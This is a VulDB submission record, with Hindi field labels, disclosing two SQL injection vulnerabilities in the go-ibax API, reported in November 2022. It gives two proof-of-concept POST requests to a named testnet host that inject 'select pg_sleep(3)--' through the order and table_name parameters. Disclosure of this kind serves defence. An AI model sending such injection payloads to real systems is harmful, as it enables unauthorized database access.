| शीर्षक | SQL Injection vulnerabilities in go-ibax via order,table_name parameter |
|---|
| विवरण | There are two SQL injection vulnerabilities.
POC:
POST https://testnet-hk1.ibax.network:5079/api/v2/open/tablesInfo
data: page=1&limit=1&order=1; select pg_sleep(3)--
POC:
POST https://testnet-hk1.ibax.network:5079/api/v2/open/columnsInfo
data: table_name=1; select pg_sleep(3)--
Reported by Tom(@Tomy) from QSec-Team of Cyber Security Department at Qi'anxin Group on 2022-11-01 |
|---|
| स्रोत | ⚠️ https://github.com/IBAX-io/go-ibax/issues/2060 |
|---|
| उपयोगकर्ता | Tomy (UID 34751) |
|---|
| सबमिशन | 01/11/2022 12:36 PM (4 साल पहले) |
|---|
| संयम | 01/11/2022 04:38 PM (4 hours later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 212634 [IBAX go-ibax /api/v2/open/tablesInfo SQL इंजेक्शन] |
|---|
| अंक | 20 |
|---|